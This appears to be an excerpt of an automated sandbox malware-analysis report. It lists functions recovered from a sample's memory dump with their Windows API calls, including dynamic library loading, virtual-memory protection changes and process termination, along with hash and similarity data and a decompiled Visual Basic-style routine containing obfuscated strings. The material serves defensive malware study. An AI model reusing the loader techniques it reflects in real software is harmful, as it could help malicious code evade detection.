Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 65f1867b9e6c5a32f20df41fec620c93eabf42960adf6a62c5ab36f9dd6726e3
Instruction ID: e235a48f35241cb233fcedf45206bd4abe58e2cb62484318f649585ffd61472c
Opcode Fuzzy Hash: 65f1867b9e6c5a32f20df41fec620c93eabf42960adf6a62c5ab36f9dd6726e3
Instruction Fuzzy Hash: E7D0122C2CC321D6910E26981F797F956B50E37BA1F73913DAC338304097688C00C592

Uniqueness

Uniqueness Score: -1.00%

Function 021C3E5F, Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(021C3EC4,80000000,00000001,00000000,00000003,00000000,00000000,021C3DFC,021C3EC4,021C04B8,?,?,?,?,?,021C01FE), ref: 021C3E94

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e3ec208524f6a987ebbce20dcad9d5f16c5f2a112af128d3963778fab2d2f563
Instruction ID: 12d5b9aa49982a1435bc6e4a1eae111d5643ab38cf9c6e6629b229d41483f3c3
Opcode Fuzzy Hash: e3ec208524f6a987ebbce20dcad9d5f16c5f2a112af128d3963778fab2d2f563
Instruction Fuzzy Hash: 6AD012707D0344B9F93406204D66FD95A155BA0B02F39D8957B867E5C2C2E55550C928

Uniqueness

Uniqueness Score: -1.00%

Function 021C0BE0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 5629d1bf9bd027b972bc83b5e6bbd61168817106b18627719b5ce9e0dcc55061
Instruction ID: 286021687c56f30e33cbd14ac8ed87977517083e7810047940b5a6e65ded7b8e
Opcode Fuzzy Hash: 5629d1bf9bd027b972bc83b5e6bbd61168817106b18627719b5ce9e0dcc55061
Instruction Fuzzy Hash: B0C012791851455ADE2519240C59BE82A550B56222FAD82845CBA560E2CB24448AC605

Uniqueness

Uniqueness Score: -1.00%

Function 021C3E58, Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(021C3EC4,80000000,00000001,00000000,00000003,00000000,00000000,021C3DFC,021C3EC4,021C04B8,?,?,?,?,?,021C01FE), ref: 021C3E94

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 45e174c85df51b90ba54fb4a855a5d121e681982c060c1dd91aadd9466201dd1
Instruction ID: 7830aa41c6f2d3d0ab4cf728154d3a00ce1e5e8e31affb91ca19283fc37a5334
Opcode Fuzzy Hash: 45e174c85df51b90ba54fb4a855a5d121e681982c060c1dd91aadd9466201dd1
Instruction Fuzzy Hash: E9D08CB07D4300F6FA388A209E16FD923205BE0F40E32880C7FA63D0C083F16B20C61A

Uniqueness

Uniqueness Score: -1.00%

Function 021C474E, Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c239b33ca21e9d4e799237b65cd5a301a73cd99fa3d409ca4813a40eff59a05f
Instruction ID: 260302b0b9c110d85a3da56b2c072af093f148108c2c325a257d220decc5b914
Opcode Fuzzy Hash: c239b33ca21e9d4e799237b65cd5a301a73cd99fa3d409ca4813a40eff59a05f
Instruction Fuzzy Hash: B5C08C2C2CC324C7420E269C2A383EA53B20E77620BB3413CAC22820009B608801C685

Uniqueness

Uniqueness Score: -1.00%

Function 021C3E7C, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(021C3EC4,80000000,00000001,00000000,00000003,00000000,00000000,021C3DFC,021C3EC4,021C04B8,?,?,?,?,?,021C01FE), ref: 021C3E94

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7c3d52e98be79e0a13df16fe7be4c597c42ba2b7d856cb3ea262e512873de153
Instruction ID: 413f864b063983d8297a2f9588eec4a73085243724893a55983405b6799543b5
Opcode Fuzzy Hash: 7c3d52e98be79e0a13df16fe7be4c597c42ba2b7d856cb3ea262e512873de153
Instruction Fuzzy Hash: 07C08CA0691140A9FE2006304C58FC95B114B81301F1C8890B94567042C7258450C818

Uniqueness

Uniqueness Score: -1.00%

Function 021C2883, Relevance: 1.3, APIs: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 189a38623cf0815f9b59d8ee553b9bd6ee711021022c14b9ab7b0c716dc2667d
Instruction ID: 4948e5e5d90697e3a718d43e306a284ad424590858bc8fbfa516c36e276a30c1
Opcode Fuzzy Hash: 189a38623cf0815f9b59d8ee553b9bd6ee711021022c14b9ab7b0c716dc2667d
Instruction Fuzzy Hash: B2F05E38285289BFEF292E50CD05BDD3B23EF11340F648058EE4666560D7B659509F42

Uniqueness

Uniqueness Score: -1.00%

Function 021C287D, Relevance: 1.3, APIs: 1, Instructions: 28sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 99559e65abcea4eb767e9242c1180c08afeb4676e0d7c37f753c640e7f601a8a
Instruction ID: b94f08619270ba4fde003604cd0cce00afae2a5c816f6ae9841afc3a06cff284
Opcode Fuzzy Hash: 99559e65abcea4eb767e9242c1180c08afeb4676e0d7c37f753c640e7f601a8a
Instruction Fuzzy Hash: 9DF01C38294289BBEF2D2E508D05BDD3A63EF21350F60812DFE5A55560D7B25A609E42

Uniqueness

Uniqueness Score: -1.00%

Function 021C2905, Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ed835c4e49920c7b300ee6fdef64a71191aeeb578c4806466653f90bb2007956
Instruction ID: 5b6a3cf2c3aacef8f345e60344683be9d90164ebb5fd08232f00ed2d612ba8f2
Opcode Fuzzy Hash: ed835c4e49920c7b300ee6fdef64a71191aeeb578c4806466653f90bb2007956
Instruction Fuzzy Hash: 71D05E7828D3898BEB290D4048553E427714B22280F26009EDC438A08183790502C623

Uniqueness

Uniqueness Score: -1.00%

Function 021C28D3, Relevance: 1.3, APIs: 1, Instructions: 14sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b989de1c5c8b7da2e68a2ce771b5549d96a4e9cc97decc1b91d2e5812f9ed398
Instruction ID: 4872dfb2186a57eb28e18de6547821b799bb4d40afd0f447c4215c41babf4d62
Opcode Fuzzy Hash: b989de1c5c8b7da2e68a2ce771b5549d96a4e9cc97decc1b91d2e5812f9ed398
Instruction Fuzzy Hash: 6BD022343823888BFF2C0E618C98BDD2A624F40303F2840ACEC0386041C3B88A40CD17

Uniqueness

Uniqueness Score: -1.00%

Function 021C2921, Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7cece0a46cd7ebc939ea85db12043c4967dc5051a309e9baef7e3f0f32ef6136
Instruction ID: dacdc458b003d40e3e658862a8026668cc62760f2f1310861501f50483c65b79
Opcode Fuzzy Hash: 7cece0a46cd7ebc939ea85db12043c4967dc5051a309e9baef7e3f0f32ef6136
Instruction Fuzzy Hash: E7C08CB8648709CBFB380E8098883C9B560AF24382F22416EAC1B4804583B90200D963

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 021C5536, Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 9239f6211c8fb4ca705c2d72b3d52b1151c14987a003d94e541db8917982aec5
Instruction ID: 205eda19a4153016edc8f68c4a2af77aa0c8dfad28fc82dd61c1f12bb9ca79b2
Opcode Fuzzy Hash: 9239f6211c8fb4ca705c2d72b3d52b1151c14987a003d94e541db8917982aec5
Instruction Fuzzy Hash: D651ED68588341DEDB298F28C4947657BD39F62220FF9C1ADC4A69F2E7D334D442CB16

Uniqueness

Uniqueness Score: -1.00%

Function 021C550B, Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 3200f99b522265fe5b8cb0c7391f940700424e66aec14ec77b910117685ce184
Instruction ID: 62a9cd74289bbdae0e11f4f7989a01a7d80f6f38a64f9c3f43d25ca92d6424b1
Opcode Fuzzy Hash: 3200f99b522265fe5b8cb0c7391f940700424e66aec14ec77b910117685ce184
Instruction Fuzzy Hash: 9251ED78988341EEDB399F28849476577D39F32220FF5C2ADC8A65F2D6D334A442CB12

Uniqueness

Uniqueness Score: -1.00%

Function 021C5524, Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 35ea6ef8a124e635c90eb912f65a490511550581b2e9d21158aa9839af149d77
Instruction ID: 7312f60aaa535df8323acd706c087511d384e10e92e2e0415f5121f4747bc044
Opcode Fuzzy Hash: 35ea6ef8a124e635c90eb912f65a490511550581b2e9d21158aa9839af149d77
Instruction Fuzzy Hash: AE51DD6898C341EEDF298F2884947657BD39F72220FF9C2ADC8665F2D6D3349442CB16

Uniqueness

Uniqueness Score: -1.00%

Function 021C55A9, Relevance: .2, Instructions: 164libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 021C5AA6: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021C5614,00000040,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C5ABF

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: b2a0226a0e42046f9c34aa450f736df48cdf68b38629166f33162a4fe587df33
Instruction ID: 2aa4dbf584dd20941527b3be4b118a7b20868e2d350a65001adb369b791c42eb
Opcode Fuzzy Hash: b2a0226a0e42046f9c34aa450f736df48cdf68b38629166f33162a4fe587df33
Instruction Fuzzy Hash: 2E51EC6858C341DEDB298F28848476577D39F32220FF9C2BDC866AF2D6D334A042CB16

Uniqueness

Uniqueness Score: -1.00%

Function 021C5581, Relevance: .2, Instructions: 162libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 021C5AA6: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021C5614,00000040,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C5ABF

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 4b8188ebc09c967dee66f9ca5f9c890c26753ce0b389e67fd9d3d0240787f3f7
Instruction ID: 6e9c77f4fc80641880ce2f62d3ed5eee1a298e28834d02579f2b98d75b2311f5
Opcode Fuzzy Hash: 4b8188ebc09c967dee66f9ca5f9c890c26753ce0b389e67fd9d3d0240787f3f7
Instruction Fuzzy Hash: 8251EE6858C341DEDB298B2884947657BD39F32220FF9C2BDC8669F2D6D3749442C716

Uniqueness

Uniqueness Score: -1.00%

Function 021C557D, Relevance: .2, Instructions: 159libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 021C5AA6: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021C5614,00000040,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C5ABF

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: f2ee718570032cc90144f921d72c3c048870a0cbe2ab5f7e6909c1f45930669e
Instruction ID: edfc83624cab80d8c077609bd372cbf223a7d07140689f180001b06d5e23afbb
Opcode Fuzzy Hash: f2ee718570032cc90144f921d72c3c048870a0cbe2ab5f7e6909c1f45930669e
Instruction Fuzzy Hash: C851CF6858C341DEDB398B2884947657BD39F32220FF9C2BDC4669F2D6D374A042C716

Uniqueness

Uniqueness Score: -1.00%

Function 021C55CD, Relevance: .2, Instructions: 159libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 021C5AA6: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021C5614,00000040,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C5ABF

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 99ac7d11554e0f3775600a18d83f56cfa18a433189fb1a597aa174450e5cce18
Instruction ID: 96b79367ccdaa6778f36767fac842601e4e4caf82c53e470501abe3f13ed6b58
Opcode Fuzzy Hash: 99ac7d11554e0f3775600a18d83f56cfa18a433189fb1a597aa174450e5cce18
Instruction Fuzzy Hash: 7551CF6858C341DEDB298B2884947657BD39F32220FF9C2BDC4669F2D6D374A442C716

Uniqueness

Uniqueness Score: -1.00%

Function 021C1C0A, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2195abafb680dfa067f7fdb5e6c2663ac5caf887a0529f18d815405c972ad6a
Instruction ID: bfc6bf17ed724c9144403748d359bf12bab8f4a88f749e34a58917bc3842a5db
Opcode Fuzzy Hash: a2195abafb680dfa067f7fdb5e6c2663ac5caf887a0529f18d815405c972ad6a
Instruction Fuzzy Hash: 3531E5346C4215BFD758AA28CC45BE573A6FF24360F76822CEC6ED3242DB26D845CB80

Uniqueness

Uniqueness Score: -1.00%

Function 021C1C19, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49e8c282305099160fee1d8c62754faa747f1273b670c0d750393e1a679a85bd
Instruction ID: 9657f5d82a6e26a09eafce1651460264826e7dd1c7522f64935dabd0c2d8b9cc
Opcode Fuzzy Hash: 49e8c282305099160fee1d8c62754faa747f1273b670c0d750393e1a679a85bd
Instruction Fuzzy Hash: 3731F6756C4205BFD758AA28CC45BE573A6FF14360F768268FC6ED3242DB25D845CB80

Uniqueness

Uniqueness Score: -1.00%

Function 021C1E40, Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 083e397c544477379bbfe1a2eb6dc1711d06daaa8b4544653bfaac274210603f
Instruction ID: a5681cf6e9c5cc3780bc4825bbc0d01c893290deadb85244240d472ed425251c
Opcode Fuzzy Hash: 083e397c544477379bbfe1a2eb6dc1711d06daaa8b4544653bfaac274210603f
Instruction Fuzzy Hash: 1921A5382C4348AFFB295E14CC94BB93763AF65310F76809DDD1A5B1E2C3749884C916

Uniqueness

Uniqueness Score: -1.00%

Function 021C1E7D, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 825e05b8bc32884dcd83b0945bdb9c6969a001a0f615fdc7754d83021ab58c87
Instruction ID: b020ac75c544cec3570640c21710655acb41632c21d78128e4aef93e24f112f0
Opcode Fuzzy Hash: 825e05b8bc32884dcd83b0945bdb9c6969a001a0f615fdc7754d83021ab58c87
Instruction Fuzzy Hash: 3C2150782C4304AFFB295E24CD89FB92663AF60700F75806DED169B1E2C7B4C884C916

Uniqueness

Uniqueness Score: -1.00%

Function 021C4F5A, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61914a5ffff3de48d87b35430648f30b5f0f831024b4b2f03778750a89591b2
Instruction ID: 2ef87be934e53af257a3eb80693eddeb00bd837f91f40b557c742b6e86fb7241
Opcode Fuzzy Hash: c61914a5ffff3de48d87b35430648f30b5f0f831024b4b2f03778750a89591b2
Instruction Fuzzy Hash: D4F039782881409FCB28DA1CC5E4F6A73E6AB75320FA2455DE461CB6A0C320EC90CA66

Uniqueness

Uniqueness Score: -1.00%

Function 021C4F60, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 711293b40ac7a26f761973372841f5bb6714576ae6d8824a6fdc9d212e300d9f
Instruction ID: 4a20b748a31c4557dd49f54ed54390da1fe31de074a4b4b9c11818c7dab24114
Opcode Fuzzy Hash: 711293b40ac7a26f761973372841f5bb6714576ae6d8824a6fdc9d212e300d9f
Instruction Fuzzy Hash: 52F0E578288140DFDB28DB08C5E4F6973E2AB64320FA64188E4618B6A1C320EC80CA55

Uniqueness

Uniqueness Score: -1.00%

Function 021C4F51, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70ba71b6a901e826f579f1f15a787a69d8c509fdfbac5508d5fb46440c187e3b
Instruction ID: a255ad26d4379b2501068296d7eaca04a7620887d846e8b164f0bc71d1aee73d
Opcode Fuzzy Hash: 70ba71b6a901e826f579f1f15a787a69d8c509fdfbac5508d5fb46440c187e3b
Instruction Fuzzy Hash: 9DE09B78288100DFDB2DDB0CC5E0F6973E1AB74720F62415DE461CB691C320EC40CA56

Uniqueness

Uniqueness Score: -1.00%

Function 021C4558, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48af68e58b320db444183f9ed7240e1fed2c072602d3f859b294d1af7a87e738
Instruction ID: 5650c6ab5e5d6ee781b43f5c523d0ba0cfba27de53258eec01fdfc2bcc8aae96
Opcode Fuzzy Hash: 48af68e58b320db444183f9ed7240e1fed2c072602d3f859b294d1af7a87e738
Instruction Fuzzy Hash: DBD0223679C000CFF3ACC6A9C1A0B9033B1E32A240BE20088E132CB208C364ED81C600

Uniqueness

Uniqueness Score: -1.00%

Function 021C2B29, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 851a0e574f4481624075a7c6e2a19bf1414e927da84a49baa64654b69ac399a8
Instruction ID: c067cec35844b773587ed7384fc1102067adadafcbf4cf501397a47b51df0c3d
Opcode Fuzzy Hash: 851a0e574f4481624075a7c6e2a19bf1414e927da84a49baa64654b69ac399a8
Instruction Fuzzy Hash: 9DC048B6650580CBEE5ACA08E5D2B80B3A4AB21688B190890E8228B622C324E904CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF9A, Relevance: 93.1, APIs: 43, Strings: 10, Instructions: 358
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E0040FF9A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				signed int _v52;
				char _v60;
				signed int _v68;
				char _v76;
				signed int _v84;
				char _v92;
				signed int _v100;
				char _v108;
				signed int _v116;
				char _v124;
				char* _v132;
				intOrPtr _v140;
				short _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				intOrPtr* _v204;
				signed int _v208;
				signed int _v212;
				intOrPtr* _v216;
				signed int _v220;
				intOrPtr* _v224;
				signed int _v228;
				signed int _v232;
				signed int _t155;
				signed int _t158;
				signed int _t162;
				char* _t165;
				signed int _t176;
				signed int _t180;
				char* _t184;
				signed int _t185;
				char* _t186;
				char* _t187;
				signed int _t191;
				signed int _t195;
				signed int _t203;
				void* _t242;
				void* _t244;
				intOrPtr _t245;

				_t245 = _t244 - 0xc;
				 *[fs:0x0] = _t245;
				L004012B0();
				_v16 = _t245;
				_v12 = 0x401288;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012b6, _t242);
				if( *0x411010 != 0) {
					_v204 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v204 = 0x411010;
				}
				_t155 =  &_v40;
				L00401400();
				_v180 = _t155;
				_t158 =  *((intOrPtr*)( *_v180 + 0x1c4))(_v180, _t155,  *((intOrPtr*)( *((intOrPtr*)( *_v204)) + 0x2fc))( *_v204));
				asm("fclex");
				_v184 = _t158;
				if(_v184 >= 0) {
					_v208 = _v208 & 0x00000000;
				} else {
					_push(0x1c4);
					_push(0x40b290);
					_push(_v180);
					_push(_v184);
					L0040140C();
					_v208 = _t158;
				}
				L00401406();
				L004013BE();
				L004013FA();
				L004013BE();
				L004013FA();
				L004013BE();
				_v52 = _t158;
				_v60 = 8;
				_v132 = L"YciDXqpeGZ128";
				_v140 = 8;
				_t162 =  *((intOrPtr*)( *_a4 + 0x218))(_a4,  &_v40, 0x40b588, _t158, "abe", _t158, "B.L", 0x40b568);
				asm("fclex");
				_v180 = _t162;
				if(_v180 >= 0) {
					_v212 = _v212 & 0x00000000;
				} else {
					_push(0x218);
					_push(0x40aed8);
					_push(_a4);
					_push(_v180);
					L0040140C();
					_v212 = _t162;
				}
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(2);
				_push(L"Add");
				_push(_v40);
				_t165 =  &_v76;
				_push(_t165);
				L0040136A();
				_push(_t165);
				L0040137C();
				_push(_t165);
				_push( &_v28);
				L00401382();
				_push( &_v36);
				_push( &_v32);
				_push(2);
				L004013EE();
				L00401406();
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L00401424();
				_v116 = L"C8a177";
				_v124 = 8;
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Caption");
				_push(_v28);
				L00401364();
				_v116 = 0x219e;
				_v124 = 2;
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Left");
				_push(_v28);
				L00401364();
				if( *0x411010 != 0) {
					_v216 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v216 = 0x411010;
				}
				_t176 =  &_v40;
				L00401400();
				_v180 = _t176;
				_t180 =  *((intOrPtr*)( *_v180 + 0xe0))(_v180,  &_v176, _t176,  *((intOrPtr*)( *((intOrPtr*)( *_v216)) + 0x2fc))( *_v216));
				asm("fclex");
				_v184 = _t180;
				if(_v184 >= 0) {
					_v220 = _v220 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x40b290);
					_push(_v180);
					_push(_v184);
					L0040140C();
					_v220 = _t180;
				}
				_v116 = _v176;
				_v124 = 2;
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Top");
				_push(_v28);
				L00401364();
				L00401406();
				_v116 = _v116 | 0xffffffff;
				_v124 = 0xb;
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Visible");
				_push(_v28);
				L00401364();
				_v116 = L"PTyVV08DId9227";
				_v124 = 0x8008;
				_push(0);
				_push(L"Caption");
				_push(_v28);
				_t184 =  &_v60;
				_push(_t184);
				L0040136A();
				_push(_t184);
				_t185 =  &_v124;
				_push(_t185);
				L0040135E();
				_v180 = _t185;
				L00401418();
				_t186 = _v180;
				if(_t186 != 0) {
					L00401352();
					_push(_t186);
					_t187 =  &_v44;
					_push(_t187);
					L00401400();
					_v188 = _t187;
					_v100 = 0x80020004;
					_v108 = 0xa;
					_v84 = 0x80020004;
					_v92 = 0xa;
					_v68 = 0x80020004;
					_v76 = 0xa;
					_v52 = 0x80020004;
					_v60 = 0xa;
					if( *0x411010 != 0) {
						_v224 = 0x411010;
					} else {
						_push(0x411010);
						_push(0x40b81c);
						L00401412();
						_v224 = 0x411010;
					}
					_t191 =  &_v40;
					L00401400();
					_v180 = _t191;
					_t195 =  *((intOrPtr*)( *_v180 + 0x158))(_v180,  &_v176, _t191,  *((intOrPtr*)( *((intOrPtr*)( *_v224)) + 0x30c))( *_v224));
					asm("fclex");
					_v184 = _t195;
					if(_v184 >= 0) {
						_v228 = _v228 & 0x00000000;
					} else {
						_push(0x158);
						_push(0x40b290);
						_push(_v180);
						_push(_v184);
						L0040140C();
						_v228 = _t195;
					}
					_t203 =  *((intOrPtr*)( *_v188 + 0x44))(_v188, _v176,  &_v60,  &_v76,  &_v92,  &_v108);
					asm("fclex");
					_v192 = _t203;
					if(_v192 >= 0) {
						_v232 = _v232 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x40b5e4);
						_push(_v188);
						_push(_v192);
						L0040140C();
						_v232 = _t203;
					}
					_push( &_v44);
					_push( &_v40);
					_push(2);
					L004013E8();
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_t186 =  &_v60;
					_push(_t186);
					_push(4);
					L00401424();
				}
				_push(E00410527);
				L00401406();
				return _t186;
			}

0x0040ff9d
0x0040ffac
0x0040ffb8
0x0040ffc0
0x0040ffc3
0x0040ffca
0x0040ffd9
0x0040ffe3
0x00410000
0x0040ffe5
0x0040ffe5
0x0040ffea
0x0040ffef
0x0040fff4
0x0040fff4
0x00410024
0x00410028
0x0041002d
0x00410041
0x00410047
